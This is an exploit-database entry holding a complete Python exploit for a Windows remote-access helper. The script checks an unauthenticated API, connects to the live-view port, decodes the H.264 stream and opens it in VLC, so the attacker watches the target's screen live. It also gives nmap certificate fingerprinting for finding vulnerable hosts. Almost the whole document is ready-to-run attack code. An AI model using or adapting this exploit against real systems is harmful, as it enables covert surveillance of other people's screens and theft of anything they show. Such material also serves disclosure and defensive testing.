Share
## https://sploitus.com/exploit?id=PACKETSTORM:219229
#!/usr/bin/env python3
    # Exploit Title: Remote Sunrise Helper for Windows 2026.14 -
    Unauthenticated Live Screen Capture
    # Date: 2026-04-20
    # Exploit Author: Chokri Hammedi
    # Software: https://rs.ltd/latest.php?os=win
    # Vendor: https://rs.ltd/
    # Version: 2026.14
    # Tested on: Windows 10 / Windows 11
    #
    # Identification:
    # nmap -p- -T4 <target> --script ssl-cert
    # Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
    
    import socket, sys, subprocess, requests, json, urllib3, threading, time,
    random
    urllib3.disable_warnings()
    
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_ip> <api_port>")
        print(f"Example: {sys.argv[0]} 192.168.1.103 49762")
        sys.exit(1)
    
    target = sys.argv[1]
    api_port = sys.argv[2]
    url = f"https://{target}:{api_port}"
    
    try:
        r = requests.get(f"{url}/api/getVersion", headers={"X-LiveView":
    "fixed"}, verify=False, timeout=5)
        data = r.json()
    
        if data.get("requires.auth") == False:
            live_port = data.get("liveview.port")
            print(f"[+] VULNERABLE - {target}")
            print(f"    Host: {data.get('host.name')} | OS:
    {data.get('win.version')}")
            print(f"    Live Port: {live_port}")
    
            local_port = random.randint(10000, 20000)
    
            def stream():
                s = socket.socket()
                s.bind(('127.0.0.1', local_port))
                s.listen(1)
                conn, _ = s.accept()
    
                remote = socket.socket()
                remote.connect((target, live_port))
    
                delim = bytes([0xF0, 0xDE, 0xBC, 0x0A])
                buf = b''
    
                while True:
                    chunk = remote.recv(65536)
                    if not chunk:
                        break
                    buf += chunk
                    while True:
                        idx = buf.find(delim)
                        if idx == -1:
                            break
                        conn.send(buf[:idx])
                        buf = buf[idx+4:]
    
            threading.Thread(target=stream, daemon=True).start()
            time.sleep(1)
    
            subprocess.Popen(['vlc', f'tcp://127.0.0.1:{local_port}',
    '--demux=h264', '--no-video-title-show', '--quiet', '--intf', 'dummy'],
                            stdout=subprocess.DEVNULL,
    stderr=subprocess.DEVNULL)
            print("[+] VLC launched")
            input("Press Enter to stop...\n")
        else:
            print(f"[*] Not vulnerable - authentication required")
    
    except KeyboardInterrupt:
        print("\n[+] Stopped")
    except Exception as e:
        print(f"[-] Error: {e}")